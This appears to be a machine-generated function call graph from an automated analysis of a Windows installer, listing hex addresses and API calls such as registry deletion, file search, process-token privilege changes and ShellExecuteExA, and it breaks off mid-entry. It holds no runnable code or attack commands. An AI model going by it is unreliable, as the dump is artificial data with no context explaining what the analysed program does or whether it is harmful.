5486->5477 5488 7340175d GlobalFree 5486->5488 5489 7340172c GlobalFree 5487->5489 5488->5477 5489->5477 4260 4023c9 4261 4023d1 4260->4261 4262 4023d7 4260->4262 4263 402c5e 21 API calls 4261->4263 4264 4023e7 4262->4264 4265 402c5e 21 API calls 4262->4265 4263->4262 4266 4023f5 4264->4266 4267 402c5e 21 API calls 4264->4267 4265->4264 4268 402c5e 21 API calls 4266->4268 4267->4266 4269 4023fe WritePrivateProfileStringA 4268->4269 5490 4045c9 5491 4045df 5490->5491 5496 4046eb 5490->5496 5493 40445e 22 API calls 5491->5493 5492 40475a 5494 404824 5492->5494 5495 404764 GetDlgItem 5492->5495 5497 404635 5493->5497 5500 4044c5 8 API calls 5494->5500 5501 40477a 5495->5501 5502 4047e2 5495->5502 5496->5492 5496->5494 5498 40472f GetDlgItem SendMessageA 5496->5498 5499 40445e 22 API calls 5497->5499 5523 404480 EnableWindow 5498->5523 5504 404642 CheckDlgButton 5499->5504 5505 40481f 5500->5505 5501->5502 5506 4047a0 SendMessageA LoadCursorA SetCursor 5501->5506 5502->5494 5507 4047f4 5502->5507 5521 404480 EnableWindow 5504->5521 5527 40486d 5506->5527 5511 4047fa SendMessageA 5507->5511 5512 40480b 5507->5512 5508 404755 5524 404849 5508->5524 5511->5512 5512->5505 5513 404811 SendMessageA 5512->5513 5513->5505 5515 404660 GetDlgItem 5522 404493 SendMessageA 5515->5522 5518 404676 SendMessageA 5519 404694 GetSysColor 5518->5519 5520 40469d SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5518->5520 5519->5520 5520->5505 5521->5515 5522->5518 5523->5508 5525 404857 5524->5525 5526 40485c SendMessageA 5524->5526 5525->5526 5526->5492 5530 405a9a ShellExecuteExA 5527->5530 5529 4047d3 LoadCursorA SetCursor 5529->5502 5530->5529 4270 4020ca 4271 40218a 4270->4271 4272 4020dc 4270->4272 4275 401423 28 API calls 4271->4275 4273 402c5e 21 API calls 4272->4273 4274 4020e3 4273->4274 4276 402c5e 21 API calls 4274->4276 4281 40230f 4275->4281 4277 4020ec 4276->4277 4278 402101 LoadLibraryExA 4277->4278 4279 4020f4 GetModuleHandleA 4277->4279 4278->4271 4280 402111 GetProcAddress 4278->4280 4279->4278 4279->4280 4282 402120 4280->4282 4283 40215d 4280->4283 4285 402128 4282->4285 4286 40213f 4282->4286 4336 405502 4283->4336 4333 401423 4285->4333 4291 7340176b 4286->4291 4287 402130 4287->4281 4289 40217e FreeLibrary 4287->4289 4289->4281 4292 7340179b 4291->4292 4347 73401b28 4292->4347 4294 734017a2 4295 734018c4 4294->4295 4296 734017b3 4294->4296 4297 734017ba 4294->4297 4295->4287 4395 7340233f 4296->4395 4379 73402381 4297->4379 4302 73401800 4408 73402568 4302->4408 4303 7340181e 4308 73401824 4303->4308 4309 7340186c 4303->4309 4304 734017d0 4307 734017d6 4304->4307 4313 734017e1 4304->4313 4305 734017e9 4318 734017df 4305->4318 4405 73402d53 4305->4405 4307->4318 4389 73402ac8 4307->4389 4427 734015fb 4308->4427 4311 73402568 11 API calls 4309->4311 4316 7340185d 4311->4316 4312 73401806 4419 734015e9 4312->4419 4399 73402742 4313->4399 4324 734018b3 4316->4324 4433 7340252e 4316->4433 4318->4302 4318->4303 4321 73402568 11 API calls 4321->4316 4323 734017e7 4323->4318 4324->4295 4326 734018bd GlobalFree 4324->4326 4326->4295 4330 7340189f 4330->4324 4437 73401572 wsprintfA 4330->4437 4331 73401898 FreeLibrary 4331->4330 4334 405502 28 API calls 4333->4334 4335 401431 4334->4335 4335->4287 4337 40551d 4336->4337 4346 4055c0 4336->4346 4338 40553a lstrlenA 4337->4338 4339 406451 21 API calls 4337->4339 4340 405563 4338->4340 4341 405548 lstrlenA 4338->4341 4339->4338 4343 405576 4340->4343 4344 405569 SetWindowTextA 4340->4344 4342 40555a lstrcatA 4341->4342 4341->4346 4342->4340 4345 40557c SendMessageA SendMessageA SendMessageA 4343->4345 4343->4346 4344->4343 4345->4346 4346->4287 4440 734012a5 GlobalAlloc 4347->4440 4349 73401b4f 4441 734012a5 GlobalAlloc 4349->4441 4351 73401d90 GlobalFree GlobalFree GlobalFree 4352 73401dad 4351->4352 4367 73401df7 4351->4367 4353 73402181 4352->4353 4361 73401dc2 4352->4361 4352->4367 4355 734021a3 GetModuleHandleA 4353->4355 4353->4367 4354 73401c4d GlobalAlloc 4359 73401b5a 4354->4359 4357 734021b4 LoadLibraryA 4355->4357 4358 734021c9 4355->4358 4356 73401cb6 GlobalFree 4356->4359 4357->4358 4357->4367 4448 73401652 GetProcAddress 4358->4448 4359->4351 4359->4354 4359->4356 4360 73401c98 lstrcpyA 4359->4360 4363 73401ca2 lstrcpyA 4359->4363 4364 734020c3 4359->4364 4366 73402047 4359->4366 4359->4367 4372 73401f89 GlobalFree 4359->4372 4374 734012b4 2 API calls 4359->4374 4442 734015c4 GlobalSize GlobalAlloc 4359->4442 4360->4363 4361->4367 4444 734012b4 4361->4444 4363->4359 4364->4367 4376 7340211c lstrcpyA 4364->4376 4365 7340221a 4365->4367 4370 73402227 lstrlenA 4365->4370 4447 734012a5 GlobalAlloc 4366->4447 4367->4294 4449 73401652 GetProcAddress 4370->4449 4372->4359 4373 734021db 4373->4365 4377 73402204 GetProcAddress 4373->4377 4374->4359 4376->4367 4377->4365 4378 7340204f 4378->4294 4380 7340239a 4379->4380 4382 734024d6 GlobalFree 4380->4382 4384 73402448 GlobalAlloc MultiByteToWideChar 4380->4384 4385 734012b4 GlobalAlloc lstrcpynA 4380->4385 4387 73402495 4380->4387 4451 7340133d 4380->4451 4382->4380 4383 734017c0 4382->4383 4383->4304 4383->4305 4383->4318 4386 73402474 GlobalAlloc CLSIDFromString GlobalFree 4384->4386 4384->4387 4385->4380 4386->4382 4387->4382 4455 734026d6 4387->4455 4390 73402ada 4389->4390 4391 73402b7f EnumWindows 4390->4391 4392 73402b9d 4391->4392 4458 73402a74 4392->4458 4394 73402c69 4394->4318 4396 73402354 4395->4396 4397 7340235f GlobalAlloc 4396->4397 4398 734017b9 4396->4398 4397->4396 4398->4297 4403 73402772 4399->4403 4400 73402820 4402 73402826 GlobalSize 4400->4402 4404 73402830 4400->4404 4401 7340280d GlobalAlloc 4401->4404 4402->4404 4403->4400 4403->4401 4404->4323 4406 73402d5e 4405->4406 4407 73402d9e GlobalFree 4406->4407 4462 734012a5 GlobalAlloc 4408->4462 4410 734025f3 lstrcpynA 4416 73402574 4410->4416 4411 73402604 StringFromGUID2 WideCharToMultiByte 4411->4416 4412 73402628 WideCharToMultiByte 4412->4416 4413 73402649 wsprintfA 4413->4416 4414 7340266d GlobalFree 4414->4416 4415 734026a7 GlobalFree 4415->4312 4416->4410 4416->4411 4416->4412 4416->4413 4416->4414 4416->4415 4417 734012f6 2 API calls 4416->4417 4463 73401361 4416->4463 4417->4416 4467 734012a5 GlobalAlloc 4419->4467 4421 734015ee 4422 734015fb 2 API calls 4421->4422 4423 734015f8 4422->4423 4424 734012f6 4423->4424 4425 73401338 GlobalFree 4424->4425 4426 734012ff GlobalAlloc lstrcpynA 4424->4426 4425->4316 4426->4425 4428 73401634 lstrcpyA 4427->4428 4429 73401607 wsprintfA 4427->4429 4432 7340164d 4428->4432 4429->4432 4432->4321 4434 7340187f 4433->4434 4435 7340253c 4433->4435 4434->4330 4434->4331 4435->4434 4436 73402555 GlobalFree 4435->4436 4436->4435 4438 734012f6 2 API calls 4437->4438 4439 73401593 4438->4439 4439->4324 4440->4349 4441->4359 4443 734015e2 4442->4443 4443->4359 4450 734012a5 GlobalAlloc 4444->4450 4446 734012c3 lstrcpynA 4446->4367 4447->4378 4448->4373 4449->4367 4450->4446 4452 73401344 4451->4452 4453 734012b4 2 API calls 4452->4453 4454 7340135f 4453->4454 4454->4380 4456 734026e4 VirtualAlloc 4455->4456 4457 7340273a 4455->4457 4456->4457 4457->4387 4459 73402a7f 4458->4459 4460 73402a84 GetLastError 4459->4460 4461 73402a8f 4459->4461 4460->4461 4461->4394 4462->4416 4464 73401389 4463->4464 4465 7340136a 4463->4465 4464->4416 4465->4464 4466 73401370 lstrcpyA 4465->4466 4466->4464 4467->4421 5531 402e4a 5532 402e72 5531->5532 5533 402e59 SetTimer 5531->5533 5534 402ec0 5532->5534 5535 402ec6 MulDiv 5532->5535 5533->5532 5536 402e80 wsprintfA SetWindowTextA SetDlgItemTextA 5535->5536 5536->5534 4468 40244e 4469 402480 4468->4469 4470 402455 4468->4470 4472 402c5e 21 API calls 4469->4472 4471 402c9e 21 API calls 4470->4471 4473 40245c 4471->4473 4474 402487 4472->4474 4475 402466 4473->4475 4479 402494 4473->4479 4480 402d1c 4474->4480 4477 402c5e 21 API calls 4475->4477 4478 40246d RegDeleteValueA RegCloseKey 4477->4478 4478->4479 4481 402d2f 4480->4481 4483 402d28 4480->4483 4481->4483 4484 402d60 4481->4484 4483->4479 4485 406244 RegOpenKeyExA 4484->4485 4486 402d8e 4485->4486 4487 402e43 4486->4487 4488 402d98 4486->4488 4487->4483 4489 402d9e RegEnumValueA 4488->4489 4498 402dc1 4488->4498 4490 402e28 RegCloseKey 4489->4490 4489->4498 4490->4487 4491 402dfd RegEnumKeyA 4492 402e06 RegCloseKey 4491->4492 4491->4498 4493 4067e6 5 API calls 4492->4493 4495 402e16 4493->4495 4494 402d60 6 API calls 4494->4498 4496 402e38 4495->4496 4497 402e1a RegDeleteKeyA 4495->4497 4496->4487 4497->4487 4498->4490 4498->4491 4498->4492 4498->4494 5548 4027cf 5549 402c5e 21 API calls 5548->5549 5550 4027d6 FindFirstFileA 5549->5550 5551 4027f9 5550->5551 5552 4027e9 5550->5552 5556 40631c wsprintfA 5551->5556 5554 402800 5557 4063be lstrcpynA 5554->5557 5556->5554 5557->5552 4558 401c53 4580 402c3c 4558->4580 4560 401c5a 4561 402c3c 21 API calls 4560->4561 4562 401c67 4561->4562 4563 402c5e 21 API calls 4562->4563 4566 401c7c 4562->4566 4563->4566 4564 401ce3 4569 402c5e 21 API calls 4564->4569 4565 401c97 4568 402c3c 21 API calls 4565->4568 4567 402c5e 21 API calls 4566->4567 4570 401c8c 4566->4570 4567->4570 4571 401c9c 4568->4571 4572 401ce8 4569->4572 4570->4564 4570->4565 4573 402c3c 21 API calls 4571->4573 4574 402c5e 21 API calls 4572->4574 4575 401ca8 4573->4575 4576 401cf1 FindWindowExA 4574->4576 4577 401cd3 SendMessageA 4575->4577 4578 401cb5 SendMessageTimeoutA 4575->4578 4579 401d0f 4576->4579 4577->4579 4578->4579 4581 406451 21 API calls 4580->4581 4582 402c51 4581->4582 4582->4560 5558 402653 5559 402658 5558->5559 5560 40266c 5558->5560 5561 402c3c 21 API calls 5559->5561 5562 402c5e 21 API calls 5560->5562 5563 402661 5561->5563 5564 402673 lstrlenA 5562->5564 5565 405ff8 WriteFile 5563->5565 5566 402695 5563->5566 5564->5563 5565->5566 5567 4014d6 5568 402c3c 21 API calls 5567->5568 5569 4014dc Sleep 5568->5569 5571 402aea 5569->5571 4583 401957 4584 401959 4583->4584 4585 402c5e 21 API calls 4584->4585 4586 40195e 4585->4586 4589 405b80 4586->4589 4629 405e3e 4589->4629 4592 405ba8 DeleteFileA 4594 401967 4592->4594 4593 405bbf 4595 405ced 4593->4595 4643 4063be lstrcpynA 4593->4643 4595->4594 4600 406751 2 API calls 4595->4600 4597 405be5 4598 405bf8 4597->4598 4599 405beb lstrcatA 4597->4599 4644 405d97 lstrlenA 4598->4644 4601 405bfe 4599->4601 4603 405d11 4600->4603 4604 405c0c lstrcatA 4601->4604 4606 405c17 lstrlenA FindFirstFileA 4601->4606 4603->4594 4605 405d15 4603->4605 4604->4606 4657 405d50 lstrlenA CharPrevA 4605->4657 4606->4595 4617 405c3b 4606->4617 4609 405d7b CharNextA 4609->4617 4610 405b38 5 API calls 4611 405d27 4610->4611 4612 405d41 4611->4612 4613 405d2b 4611->4613 4616 405502 28 API calls 4612->4616 4613->4594 4619 405502 28 API calls 4613->4619 4614 405ccc FindNextFileA 4614->4617 4618 405ce4 FindClose 4614->4618 4616->4594 4617->4609 4617->4614 4625 405c8d 4617->4625 4648 4063be lstrcpynA 4617->4648 4618->4595 4620 405d38 4619->4620 4621 406197 40 API calls 4620->4621 4624 405d3f 4621->4624 4623 405b80 64 API calls 4623->4625 4624->4594 4625->4614 4625->4623 4626 405502 28 API calls 4625->4626 4627 405502 28 API calls 4625->4627 4628 406197 40 API calls 4625->4628 4649 405b38 4625->4649 4626->4614 4627->4625 4628->4625 4660 4063be lstrcpynA 4629->4660 4631 405e4f 4661 405de9 CharNextA CharNextA 4631->4661 4634 405ba0 4634->4592 4634->4593 4635 4066b8 5 API calls 4641 405e65 4635->4641 4636 405e90 lstrlenA 4637 405e9b 4636->4637 4636->4641 4638 405d50 3 API calls 4637->4638 4640 405ea0 GetFileAttributesA 4638->4640 4639 406751 2 API calls 4639->4641 4640->4634 4641->4634 4641->4636 4641->4639 4642 405d97 2 API calls 4641->4642 4642->4636 4643->4597 4645 405da4 4644->4645 4646 405db5 4645->4646 4647 405da9 CharPrevA 4645->4647 4646->4601 4647->4645 4647->4646 4648->4617 4667 405f2c GetFileAttributesA 4649->4667 4652 405b65 4652->4625 4653 405b53 RemoveDirectoryA 4655 405b61 4653->4655 4654 405b5b DeleteFileA 4654->4655 4655->4652 4656 405b71 SetFileAttributesA 4655->4656 4656->4652 4658 405d1b 4657->4658 4659 405d6a lstrcatA 4657->4659 4658->4610 4659->4658 4660->4631 4662 405e04 4661->4662 4665 405e14 4661->4665 4663 405e0f CharNextA 4662->4663 4662->4665 4666 405e34 4663->4666 4664 405d7b CharNextA 4664->4665 4665->4664 4665->4666 4666->4634 4666->4635 4668 405b44 4667->4668 4669 405f3e SetFileAttributesA 4667->4669 4668->4652 4668->4653 4668->4654 4669->4668 4670 402758 4671 40275f 4670->4671 4672 402a6c 4670->4672 4673 402c3c 21 API calls 4671->4673 4674 402766 4673->4674 4675 402775 SetFilePointer 4674->4675 4675->4672 4676 402785 4675->4676 4678 40631c wsprintfA 4676->4678 4678->4672 5572 73401058 5573 73401074 5572->5573 5574 734010dc 5573->5574 5576 73401091 5573->5576 5585 7340154b 5573->5585 5577 7340154b GlobalFree 5576->5577 5578 734010a1 5577->5578 5579 734010b1 5578->5579 5580 734010a8 GlobalSize 5578->5580 5581 734010b5 GlobalAlloc 5579->5581 5582 734010c6 5579->5582 5580->5579 5583 73401572 3 API calls 5581->5583 5584 734010d1 GlobalFree 5582->5584 5583->5582 5584->5574 5587 73401551 5585->5587 5586 73401557 5586->5576 5587->5586 5588 73401563 GlobalFree 5587->5588 5588->5576 5589 401e5a GetDC 5590 402c3c 21 API calls 5589->5590 5591 401e6c GetDeviceCaps MulDiv ReleaseDC 5590->5591 5592 402c3c 21 API calls 5591->5592 5593 401e9d 5592->5593 5594 406451 21 API calls 5593->5594 5595 401eda CreateFontIndirectA 5594->5595 5596 40264d 5595->5596 5597 406ada 5599 40695e 5597->5599 5598 4072c9 5599->5598 5600 4069e8 GlobalAlloc 5599->5600 5601 4069df GlobalFree 5599->5601 5602 406a56 GlobalFree 5599->5602 5603 406a5f GlobalAlloc 5599->5603 5600->5598 5600->5599 5601->5600 5602->5603 5603->5598 5603->5599 4708 4015e0 4709 402c5e 21 API calls 4708->4709 4710 4015e7 4709->4710 4711 405de9 4 API calls 4710->4711 4712 4015ef 4711->4712 4713 401649 4712->4713 4714 405d7b CharNextA 4712->4714 4724 401631 GetFileAttributesA 4712->4724 4727 405a3f 4712->4727 4730 4059c8 CreateDirectoryA 4712->4730 4734 405a22 CreateDirectoryA 4712->4734 4715 40164e 4713->4715 4717 401677 4713->4717 4714->4712 4716 401423 28 API calls 4715->4716 4718 401655 4716->4718 4719 401423 28 API calls 4717->4719 4733 4063be lstrcpynA 4718->4733 4725 40166f 4719->4725 4723 401660 SetCurrentDirectoryA 4723->4725 4724->4712 4728 4067e6 5 API calls 4727->4728 4729 405a46 4728->4729 4729->4712 4731 405a14 4730->4731 4732 405a18 GetLastError 4730->4732 4731->4712 4732->4731 4733->4723 4735 405a32 4734->4735 4736 405a36 GetLastError 4734->4736 4735->4712 4736->4735 5604 4016e0 5605 402c5e 21 API calls 5604->5605 5606 4016e6 GetFullPathNameA 5605->5606 5607 4016fd 5606->5607 5608 40171e 5606->5608 5607->5608 5611 406751 2 API calls 5607->5611 5609 401732 GetShortPathNameA 5608->5609 5610 402aea 5608->5610 5609->5610 5612 40170e 5611->5612 5612->5608 5614 4063be lstrcpynA 5612->5614 5614->5608 5615 734010e0 5621 73401110 5615->5621 5616 7340129a GlobalFree 5617 734011cd GlobalAlloc 5617->5621 5618 73401286 GlobalFree 5618->5621 5619 7340133d 2 API calls 5619->5621 5620 73401295 5620->5616 5621->5616 5621->5617 5621->5618 5621->5619 5621->5620 5622 734012f6 2 API calls 5621->5622 5623 73401165 GlobalAlloc 5621->5623 5624 73401361 lstrcpyA 5621->5624 5622->5621 5623->5621 5624->5621 5625 73401661 5626 7340154b GlobalFree 5625->5626 5628 73401679 5626->5628 5627 734016bf GlobalFree 5628->5627 5629 73401694 5628->5629 5630 734016ab VirtualFree 5628->5630 5629->5627 5630->5627 4765 404e63 GetDlgItem GetDlgItem 4766 404eb9 7 API calls 4765->4766 4776 4050e0 4765->4776 4767 404f61 DeleteObject 4766->4767 4768 404f55 SendMessageA 4766->4768 4769 404f6c 4767->4769 4768->4767 4770 404fa3 4769->4770 4772 406451 21 API calls 4769->4772 4821 40445e 4770->4821 4771 4051a3 4781 4051c2 4771->4781 4782 4051b4 SendMessageA 4771->4782 4778 404f85 SendMessageA SendMessageA 4772->4778 4774 40526e 4775 405278 SendMessageA 4774->4775 4784 405280 4774->4784 4775->4784 4776->4771 4777 40513e 4776->4777 4776->4781 4826 404db1 SendMessageA 4777->4826 4778->4769 4779 404fb7 4786 40445e 22 API calls 4779->4786 4780 405461 4843 4044c5 4780->4843 4781->4774 4781->4780 4787 40521b SendMessageA 4781->4787 4782->4781 4789 405292 ImageList_Destroy 4784->4789 4790 405299 4784->4790 4798 4052a9 4784->4798 4802 404fc8 4786->4802 4787->4780 4792 405230 SendMessageA 4787->4792 4789->4790 4793 4052a2 GlobalFree 4790->4793 4790->4798 4791 405423 4791->4780 4796 405435 ShowWindow GetDlgItem ShowWindow 4791->4796 4795 405243 4792->4795 4793->4798 4794 4050a2 GetWindowLongA SetWindowLongA 4797 4050bb 4794->4797 4807 405254 SendMessageA 4795->4807 4796->4780 4799 4050c0 ShowWindow 4797->4799 4800 4050d8 4797->4800 4798->4791 4815 4052e4 4798->4815 4831 404e31 4798->4831 4824 404493 SendMessageA 4799->4824 4825 404493 SendMessageA 4800->4825 4801 40514f 4801->4771 4802->4794 4803 40509d 4802->4803 4806 40501a SendMessageA 4802->4806 4808 405058 SendMessageA 4802->4808 4809 40506c SendMessageA 4802->4809 4803->4794 4803->4797 4806->4802 4807->4774 4808->4802 4809->4802 4811 4050d3 4811->4780 4812 4053ee 4813 4053f9 InvalidateRect 4812->4813 4818 405405 4812->4818 4813->4818 4814 405312 SendMessageA 4816 405328 4814->4816 4815->4814 4815->4816 4816->4812 4817 405389 4816->4817 4819 40539c SendMessageA SendMessageA 4816->4819 4817->4819 4818->4791 4840 404d6c 4818->4840 4819->4816 4822 406451 21 API calls 4821->4822 4823 404469 SetDlgItemTextA 4822->4823 4823->4779 4824->4811 4825->4776 4827 404e10 SendMessageA 4826->4827 4828 404dd4 GetMessagePos ScreenToClient SendMessageA 4826->4828 4829 404e08 4827->4829 4828->4829 4830 404e0d 4828->4830 4829->4801 4830->4827 4857 4063be lstrcpynA 4831->4857 4833 404e44 4858 40631c wsprintfA 4833->4858 4835 404e4e 4859 40140b 4835->4859 4839 404e5e 4839->4815 4867 404ca7 4840->4867 4842 404d81 4842->4791 4844 404588 4843->4844 4845 4044dd GetWindowLongA 4843->4845 4845->4844 4846 4044f2 4845->4846 4846->4844 4847 404522 4846->4847 4848 40451f GetSysColor 4846->4848 4849 404532 SetBkMode 4847->4849 4850 404528 SetTextColor 4847->4850 4848->4847 4851 404550 4849->4851 4852 40454a GetSysColor 4849->4852 4850->4849 4853 404561 4851->4853 4854 404557 SetBkColor 4851->4854 4852->4851 4853->4844 4855 404574 DeleteObject 4853->4855 4856 40457b CreateBrushIndirect 4853->4856 4854->4853 4855->4856 4856->4844 4857->4833 4858->4835 4863 401389 4859->4863 4862 4063be lstrcpynA 4862->4839 4865 401390 4863->4865 4864 4013fe 4864->4862 4865->4864 4866 4013cb MulDiv SendMessageA 4865->4866 4866->4865 4868 404cbd 4867->4868 4869 406451 21 API calls 4868->4869 4870 404d21 4869->4870 4871 406451 21 API calls 4870->4871 4872 404d2c 4871->4872 4873 406451 21 API calls 4872->4873 4874 404d42 lstrlenA wsprintfA SetDlgItemTextA 4873->4874 4874->4842 4957 403f64 4958 403f7c 4957->4958 4959 4040dd 4957->4959 4958->4959 4962 403f88 4958->4962 4960 40412e 4959->4960 4961 4040ee GetDlgItem GetDlgItem 4959->4961 4964 404188 4960->4964 4976 401389 2 API calls 4960->4976 4963 40445e 22 API calls 4961->4963 4965 403f93 SetWindowPos 4962->4965 4966 403fa6 4962->4966 4969 404118 SetClassLongA 4963->4969 4977 4040d8 4964->4977 5031 4044aa 4964->5031 4965->4966 4967 403ff1 4966->4967 4968 403faf ShowWindow 4966->4968 4973 404010 4967->4973 4974 403ff9 DestroyWindow 4967->4974 4971 4040ca 4968->4971 4972 403fcf GetWindowLongA 4968->4972 4975 40140b 2 API calls 4969->4975 4983 4044c5 8 API calls 4971->4983 4972->4971 4978 403fe8 ShowWindow 4972->4978 4980 404015 SetWindowLongA 4973->4980 4981 404026 4973->4981 4979 404408 4974->4979 4975->4960 4982 404160 4976->4982 4978->4967 4979->4977 4988 404418 ShowWindow 4979->4988 4980->4977 4981->4971 4986 404032 GetDlgItem 4981->4986 4982->4964 4987 404164 SendMessageA 4982->4987 4983->4977 4984 40140b 2 API calls 4999 40419a 4984->4999 4985 4043e9 DestroyWindow EndDialog 4985->4979 4989 404060 4986->4989 4990 404043 SendMessageA IsWindowEnabled 4986->4990 4987->4977 4988->4977 4992 40406d 4989->4992 4993 404080 4989->4993 4994 4040b4 SendMessageA 4989->4994 5003 404065 4989->5003 4990->4977 4990->4989 4991 406451 21 API calls 4991->4999 4992->4994 4992->5003 4996 404088 4993->4996 4997 40409d 4993->4997 4994->4971 5000 40140b 2 API calls 4996->5000 5001 40140b 2 API calls 4997->5001 4998 40409b 4998->4971 4999->4977 4999->4984 4999->4985 4999->4991 5002 40445e 22 API calls 4999->5002 5005 40445e 22 API calls 4999->5005 5021 404329 DestroyWindow 4999->5021 5000->5003 5004 4040a4 5001->5004 5002->4999 5040 404437 5003->5040 5004->4971 5004->5003 5006 404215 GetDlgItem 5005->5006 5007 404232 ShowWindow KiUserCallbackDispatcher 5006->5007 5008 40422a 5006->5008 5034 404480 EnableWindow 5007->5034 5008->5007 5010 40425c EnableWindow 5015 404270 5010->5015 5011 404275 GetSystemMenu EnableMenuItem SendMessageA 5012 4042a5 SendMessageA 5011->5012 5011->5015 5012->5015 5015->5011 5035 404493 SendMessageA 5015->5035 5036 403f45 5015->5036 5039 4063be lstrcpynA 5015->5039 5017 4042d4 lstrlenA 5018 406451 21 API calls 5017->5018 5019 4042e5 SetWindowTextA 5018->5019 5020 401389 2 API calls 5019->5020 5020->4999 5021->4979 5022 404343 CreateDialogParamA 5021->5022 5022->4979 5023 404376 5022->5023 5024 40445e 22 API calls 5023->5024 5025 404381 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5024->5025 5026 401389 2 API calls 5025->5026 5027 4043c7 5026->5027 5027->4977 5028 4043cf ShowWindow 5027->5028 5029 4044aa SendMessageA 5028->5029 5030 4043e7 5029->5030 5030->4979 5032 4044c2 5031->5032 5033 4044b3 SendMessageA 5031->5033 5032->4999 5033->5032 5034->5010 5035->5015 5037 406451 21 API calls 5036->5037 5038 403f53 SetWindowTextA 5037->5038 5038->5015 5039->5017 5041 404444 SendMessageA 5040->5041 5042 40443e 5040->5042 5041->4998 5042->5041 5043 401eea 5044 402c3c 21 API calls 5043->5044 5045 401ef0 5044->5045 5046 402c3c 21 API calls 5045->5046 5047 401efc 5046->5047 5048 401f13 EnableWindow 5047->5048 5049 401f08 ShowWindow 5047->5049 5050 402aea 5048->5050 5049->5050 5638 734022ea 5639 73402354 5638->5639 5640 7340235f GlobalAlloc 5639->5640 5641 7340237e 5639->5641 5640->5639 5051 40176b 5052 402c5e 21 API calls 5051->5052 5053 401772 5052->5053 5057 405f80 5053->5057 5055 401779 5056 405f80 2 API calls 5055->5056 5056->5055 5058 405f8b GetTickCount GetTempFileNameA 5057->5058 5059 405fbc 5058->5059 5060 405fb8 5058->5060 5059->5055 5060->5058 5060->5059 5642 40196c 5643 402c5e 21 API calls 5642->5643 5644 401973 lstrlenA 5643->5644 5645 40264d 5644->5645 5646 4048f0 5647 40491c 5646->5647 5648 40492d 5646->5648 5707 405ab8 GetDlgItemTextA 5647->5707 5650 404939 GetDlgItem 5648->5650 5656 404998 5648->5656 5651 40494d 5650->5651 5655 404961 SetWindowTextA 5651->5655 5659 405de9 4 API calls 5651->5659 5652 404a7c 5705 404c26 5652->5705 5709 405ab8 GetDlgItemTextA 5652->5709 5653 404927 5654 4066b8 5 API calls 5653->5654 5654->5648 5660 40445e 22 API calls 5655->5660 5656->5652 5661 406451 21 API calls 5656->5661 5656->5705 5658 4044c5 8 API calls 5663 404c3a 5658->5663 5664 404957 5659->5664 5665 40497d 5660->5665 5666 404a0c SHBrowseForFolderA 5661->5666 5662 404aac 5667 405e3e 18 API calls 5662->5667 5664->5655 5671 405d50 3 API calls 5664->5671 5668 40445e 22 API calls 5665->5668 5666->5652 5669 404a24 CoTaskMemFree 5666->5669 5670 404ab2 5667->5670 5672 40498b 5668->5672 5673 405d50 3 API calls 5669->5673 5710 4063be lstrcpynA 5670->5710 5671->5655 5708 404493 SendMessageA 5672->5708 5675 404a31 5673->5675 5678 404a68 SetDlgItemTextA 5675->5678 5683 406451 21 API calls 5675->5683 5677 404991 5680 4067e6 5 API calls 5677->5680 5678->5652 5679 404ac9 5681 4067e6 5 API calls 5679->5681 5680->5656 5682 404ad0 5681->5682 5685 404b0c 5682->5685 5693 405d97 2 API calls 5682->5693 5694 404b64 5682->5694 5684 404a50 lstrcmpiA 5683->5684 5684->5678 5686 404a61 lstrcatA 5684->5686 5711 4063be lstrcpynA 5685->5711 5686->5678 5688 404b13 5689 405de9 4 API calls 5688->5689 5690 404b19 GetDiskFreeSpaceA 5689->5690 5692 404b3d MulDiv 5690->5692 5690->5694 5692->5694 5693->5682 5695 404bd5 5694->5695 5697 404d6c 24 API calls 5694->5697 5696 404bf8 5695->5696 5698 40140b 2 API calls 5695->5698 5712 404480 EnableWindow 5696->5712 5699 404bc2 5697->5699 5698->5696 5701 404bd7 SetDlgItemTextA 5699->5701 5702 404bc7 5699->5702 5701->5695 5703 404ca7 24 API calls 5702->5703 5703->5695 5704 404c14 5704->5705 5706 404849 SendMessageA 5704->5706 5705->5658 5706->5705 5707->5653 5708->5677 5709->5662 5710->5679 5711->5688 5712->5704 5713 401ff0 5714 402c5e 21 API calls 5713->5714 5715 401ff7 5714->5715 5716 406751 2 API calls 5715->5716 5717 401ffd 5716->5717 5719 40200f 5717->5719 5720 40631c wsprintfA 5717->5720 5720->5719 5088 4034f1 SetErrorMode GetVersionExA 5089 403543 GetVersionExA 5088->5089 5091 403582 5088->5091 5090 40355f 5089->5090 5089->5091 5090->5091 5092 403606 5091->5092 5093 4067e6 5 API calls 5091->5093 5094 406778 3 API calls 5092->5094 5093->5092 5095 40361c lstrlenA 5094->5095 5095->5092 5096 40362c 5095->5096 5097 4067e6 5 API calls 5096->5097 5098 403633 5097->5098 5099 4067e6 5 API calls 5098->5099 5100 40363a 5099->5100 5101 4067e6 5 API calls 5100->5101 5102 403646 #17 OleInitialize SHGetFileInfoA 5101->5102 5177 4063be lstrcpynA 5102->5177 5105 403694 GetCommandLineA 5178 4063be lstrcpynA 5105->5178 5107 4036a6 5108 405d7b CharNextA 5107->5108 5109 4036cd CharNextA 5108->5109 5117 4036dc 5109->5117 5110 4037a2 5111 4037b6 GetTempPathA 5110->5111 5179 4034c0 5111->5179 5113 4037ce 5114 4037d2 GetWindowsDirectoryA lstrcatA 5113->5114 5115 403828 DeleteFileA 5113->5115 5118 4034c0 12 API calls 5114->5118 5189 402f81 GetTickCount GetModuleFileNameA 5115->5189 5116 405d7b CharNextA 5116->5117 5117->5110 5117->5116 5121 4037a4 5117->5121 5120 4037ee 5118->5120 5120->5115 5124 4037f2 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 5120->5124 5275 4063be lstrcpynA 5121->5275 5122 40383b 5130 405d7b CharNextA 5122->5130 5159 4038c0 5122->5159 5169 4038d0 5122->5169 5126 4034c0 12 API calls 5124->5126 5128 403820 5126->5128 5128->5115 5128->5169 5134 403855 5130->5134 5131 403a41 5133 403a49 GetCurrentProcess OpenProcessToken 5131->5133 5141 403abf ExitProcess 5131->5141 5132 4038ea 5135 405ad4 MessageBoxIndirectA 5132->5135 5136 403a60 LookupPrivilegeValueA AdjustTokenPrivileges 5133->5136 5137 403a8f 5133->5137 5138 40389a 5134->5138 5139 4038ff 5134->5139 5140 4038f7 ExitProcess 5135->5140 5136->5137 5143 4067e6 5 API calls 5137->5143 5144 405e3e 18 API calls 5138->5144 5145 405a3f 5 API calls 5139->5145 5146 403a96 5143->5146 5147 4038a6 5144->5147 5148 403904 lstrlenA 5145->5148 5149 403aab ExitWindowsEx 5146->5149 5151 403ab8 5146->5151 5147->5169 5276 4063be 